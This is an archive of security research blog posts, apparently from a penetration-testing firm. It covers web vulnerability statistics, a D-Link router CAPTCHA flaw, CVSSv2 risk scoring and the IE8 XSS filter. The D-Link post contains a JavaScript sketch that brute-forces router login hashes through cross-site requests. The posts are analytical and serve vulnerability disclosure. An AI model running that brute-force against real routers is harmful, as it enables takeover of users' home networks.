The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2008. This initiative is a collaborative, industry-wide effort to pool sanitized website vulnerability data and gain a better understanding of the web application vulnerability landscape. We determine which classes of attacks are the most prevalent, regardless of the methodology used to identify them. Industry statistics such as those compiled by the MITRE CVE project provide valuable insight into the types of vulnerabilities discovered in open source and commercial applications; this project aims to be the equivalent for custom web applications.
This article presents web application vulnerability statistics collected during penetration tests, security audits, and other assessments performed by companies that were WASC members in 2008. The statistics cover 12,186 sites with 97,554 detected vulnerabilities.
WASC Web Application Security Statistics 2008
Download.
Monday, October 19, 2009
Wednesday, June 3, 2009
Adding protection means adding a hole
Funny news
New D-Link protection for Wi-Fi routers is itself a security hole!
D-Link had barely announced updated firmware for its wireless routers, featuring protection against automated registrations (a CAPTCHA), when several enthusiasts found out that this new protection measure actually makes the routers more vulnerable to password theft.
http://www.securitylab.ru/news/379779.php
Details:
http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/
Some comments on the SecurityLab forum ask:
Is this just another default-password attack?
The situation is actually more amusing. D-Link uses the CAPTCHA to protect against Cross-Site Request Forgery (CSRF), or more precisely against the router exploitation technique that Symantec aptly named Drive-by Pharming. But an implementation error (requests with a valid hash are accepted without the CAPTCHA) turns this protection into a vulnerability.
If the password is the default one, there is a way to bypass Basic authentication via JavaScript (see "Breaking through the perimeter", http://www.securitylab.ru/analytics/292473.php).
But if the password (or a derivative of it, such as a hash) is sent as a GET parameter (duplicating Basic auth), the situation is more interesting: an attacker can use not only the default password hash but also mount a JavaScript brute-force attack on the user's password via CSRF, the very attack the CAPTCHA was supposed to prevent.
This means the vulnerability concerns more than default passwords: it also increases the effectiveness of brute-force attacks on user passwords via CSRF. Standard password protections (timeouts, temporary lockouts, etc.) do not help, because the attacker does not hammer the login form directly but sends connection attempts with different "normal" hashes used in place of a session identifier. A simple script is enough; it requests the address
GET /post_login.xml?hash=
and checks whether the action succeeded. All that remains is to trick the user into opening the page :)
All in all, a rather interesting design error in a web application's authentication mechanism.
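Such a script could look roughly like this. Only the /post_login.xml path comes from the advisory; the way candidate hashes are supplied and success is detected is purely an assumption for illustration:

```javascript
// Hypothetical sketch of the CSRF brute-force described above.
// The hash is sent as a GET parameter in place of a session identifier,
// and no CAPTCHA is required because requests with a valid hash are
// accepted without it.
function buildLoginUrl(routerBase, hash) {
  return routerBase + "/post_login.xml?hash=" + encodeURIComponent(hash);
}

async function bruteForce(routerBase, candidateHashes, checkLoggedIn) {
  for (const hash of candidateHashes) {
    // Fired cross-origin from the victim's browser, so the response body
    // is opaque; success has to be inferred indirectly (e.g. by a
    // follow-up request that only works when logged in).
    await fetch(buildLoginUrl(routerBase, hash), { mode: "no-cors" });
    if (await checkLoggedIn()) return hash;
  }
  return null; // no candidate worked
}
```

Because the router's lockout logic only counts raw login attempts, this loop never triggers it.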
Thursday, March 19, 2009
Webspider. Express vulnerability assessment
A concept preview of the Webspider express security scanner (pure AJAX :) has recently been published. It is a tool that analyzes, in seconds, the software most frequently targeted by attackers. The system is intended for express security checks of Internet and intranet users, users of e-commerce systems, and ISP clients.
You can test it here:
http://www.securitylab.ru/addons/webspider3/fast_check.php

The current version can detect vulnerabilities in popular ActiveX components and plug-ins, the Mozilla Firefox and Opera browsers, and Java and Adobe Flash applications, and also checks for the MS07-042, MS08-069 and MS09-002 updates.
We plan to publish a detailed article about the techniques used in April.
It is only a preview, so please be indulgent.
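Client-side checks of this kind usually reduce to reading a component's reported version and comparing it against the first fixed release. A minimal sketch of that comparison (dotted-numeric versions are an assumption; Webspider's actual logic has not been published yet):

```javascript
// Hypothetical sketch: flag a component as vulnerable when its reported
// version is older than the first fixed version. Assumes simple
// dotted-numeric version strings like "9.0.115".
function versionLess(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0, y = pb[i] || 0; // missing parts count as 0
    if (x !== y) return x < y;
  }
  return false; // equal versions
}

function isVulnerable(reportedVersion, firstFixedVersion) {
  return versionLess(reportedVersion, firstFixedVersion);
}
```

In the browser, the reported version would come from sources such as navigator.plugins or probing an ActiveX object; the comparison itself stays the same.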
Labels:
Positive Technologies,
reaserch,
tools,
Web
Tuesday, March 10, 2009
Positive Technologies Research Lab
This year we decided to resume publishing details of vulnerabilities found during our research and penetration tests.
http://en.securitylab.ru/lab/
In 2006, for a number of reasons, we decided to shift the burden of publishing vulnerability details to software vendors and stopped publishing details of previously detected problems. However, many customers ask us to help eliminate vulnerabilities in third-party software, which has prompted us to resume the process.
The most interesting current problem (in my opinion) is a set of vulnerabilities in VMware that allow an attacker to escape from the guest to the host OS. Straight into the kernel, no less.
I have personally tried various approaches to getting vulnerabilities in third-party software fixed, from Full-Disclosure extremism to selling vulnerabilities on the "white" market, for example to iDefense (http://labs.idefense.com/vcp/). Some thoughts are available here:
http://www.securitylab.ru/analytics/241826.php (Russian)
Labels:
pentest,
Positive Technologies,
reaserch
Monday, January 26, 2009
Risks, risks, risks
During a recent security assessment I came across vulnerabilities in the web management interface of a UTM device. The combination of CSRF and XSS is interesting because it lets an attacker reach the device command line and manage the system interactively through the administrator's browser. But the vulnerability itself, typical as it is, is not the whole point.
The most interesting part (as always) was communicating with the vendor. We could not agree on the vulnerability's risk level, which led to a rather desperate correspondence. Here I would like to share our thoughts on the subject.
As a rule, the risk level is set by the software vendor or by a company that produces protection tools (vulnerability scanners, intrusion detection systems, etc.). A typical scheme resembling traffic lights is used: low risk (green), medium risk (yellow), high risk (red). Sometimes a fourth level is added for critical vulnerabilities.
Many vendors use this approach; for example, Microsoft uses four vulnerability risk levels in its security bulletins.
But the "traffic lights" model is not transparent and depends heavily on the expert's world view, state of mind, and other factors. That is why we use the CVSSv2 methodology.
English
http://www.first.org/cvss/cvss-guide.html
Russian
http://www.securitylab.ru/analytics/355336.php
http://www.securitylab.ru/analytics/356476.php
The fairly simple metrics on which CVSSv2 is based allow risks to be assessed more or less consistently. In addition, the metrics capture several extra factors, such as exploitability and environment, which is very important.
Quotation (Russian):
Leaving aside the advantages and disadvantages of these methods, the following characteristics can affect assessment reliability:
- Context dependence;
- System configuration dependence;
- Assessment method dependence.
Vulnerabilities of the same type can pose different risks in different applications. For example, a CSRF vulnerability may be no threat at all on a typical presentation site or search engine, yet critical in the web interface of an e-mail or payment system. Through an information leak, an attacker might gain access to application logs (low or medium risk) or download a backup copy of the site (high risk).
System configuration also affects the risk level. An "SQL Injection" vulnerability is usually classified as high risk. But if the web application has restricted rights on the database server, it becomes a medium- or low-risk issue; in another installation, the same vulnerability could be used to access the operating system with superuser rights, making it critical.
The assessment method matters as well. In the example above, a network scanner can only flag "SQL Injection" as a problem. To determine what privileges a potential attacker would gain, one has to actually exploit the vulnerability, or examine the interaction between the web application and the database server in a white-box assessment.
So assigning equal risk levels to different vulnerabilities of the same type (for example, SQL Injection) without detailed analysis is simply incorrect.
Here is an example.
Let's assume that an SQL Injection gives access to the DBMS with minimal web server privileges, for example db_reader, and that the web application does not store confidential data (such as passwords) in the DBMS.
The CVSSv2 vector and risk level are:
In the other case, if user passwords (including the administrator's) are stored in the DBMS, the risk level is higher, since the attack has a greater impact on data confidentiality:
(AV:N/AC:L/Au:N/C:C/I:N/A:P/E:H/RL:W/RC:C)= 8.1
If the web server has unreasonably broad privileges on the database server, for example sa, the same vulnerability is much more dangerous:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:W/RC:C) = 9.5
If we reduce these to the "traffic lights" model or the five PCI DSS levels (Urgent, Critical, High, Medium, Low), the result is:
1. Medium (2) and High (3)
2. Medium (2) and Critical (4)
3. High (3) and Urgent (>4).
This means that the risk level of a vulnerability can vary greatly depending on the system and its configuration.
The CVSSv2 vector for the XSS described at the beginning of this note is:
(AV:N/AC:H/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:C) = 6.9
So in PCI DSS terms (currently the most popular model), the risk level of the issue is High or even Critical, certainly not Low. And in any case, the audit is failed :))
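The temporal scores quoted above follow directly from the CVSSv2 equations. A small calculator sketch (weights taken from the CVSSv2 specification; only the metric values that appear in these vectors are included):

```javascript
// CVSSv2 metric weights from the specification, limited to the values
// used in the vectors discussed above.
const W = {
  AV:  { L: 0.395, A: 0.646, N: 1.0 },
  AC:  { H: 0.35, M: 0.61, L: 0.71 },
  Au:  { M: 0.45, S: 0.56, N: 0.704 },
  CIA: { N: 0.0, P: 0.275, C: 0.66 },
  E:   { F: 0.95, H: 1.0 },
  RL:  { W: 0.95 },
  RC:  { C: 1.0 },
};

function round1(x) { return Math.round(x * 10) / 10; }

// Base score from impact and exploitability, then the temporal
// adjustment for Exploitability (E), Remediation Level (RL) and
// Report Confidence (RC).
function cvss2Temporal(av, ac, au, c, i, a, e, rl, rc) {
  const impact = 10.41 * (1 - (1 - W.CIA[c]) * (1 - W.CIA[i]) * (1 - W.CIA[a]));
  const exploitability = 20 * W.AV[av] * W.AC[ac] * W.Au[au];
  const f = impact === 0 ? 0 : 1.176;
  const base = round1((0.6 * impact + 0.4 * exploitability - 1.5) * f);
  return round1(base * W.E[e] * W.RL[rl] * W.RC[rc]);
}

// The three vectors from the text:
console.log(cvss2Temporal("N", "L", "N", "C", "N", "P", "H", "W", "C")); // 8.1
console.log(cvss2Temporal("N", "L", "N", "C", "C", "C", "H", "W", "C")); // 9.5
console.log(cvss2Temporal("N", "H", "N", "C", "C", "C", "F", "W", "C")); // 6.9
```

Plugging in a different configuration (say, AC:H instead of AC:L) immediately shows how much the score moves, which is exactly the point of the examples above.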
PS. I can understand the vendor's reasoning: if security was not considered when the software was designed, then (quoting) "hardening the management interface would probably imply a complete redesign of it".
And that is how risk assessments vary.
Monday, November 24, 2008
IE 8 and XSS
Here are the results of an analysis of the XSS filter built into the current beta of Internet Explorer 8. Our colleagues at Microsoft have achieved rather good results: the most widespread attack vectors for this vulnerability are blocked.
Amusingly, a different vulnerability (HTTP Response Splitting) was found that allows attackers to disable the XSS protection. I hope the problem will be fixed in the release version.
Given that XSS is the most widespread web problem according to both Positive Technologies and international WASC statistics, the presence of such mechanisms in browsers is a useful initiative. I think antivirus/HIPS developers should also pay attention to this area.
Below is a condensed summary of the filter's efficiency against different attack vectors:
Stored XSS         | No
DOM-based XSS      | Partly
Reflected XSS:
  In tag           | No
  In JavaScript    | No
  In HTML          | Yes
  In tag parameter | Yes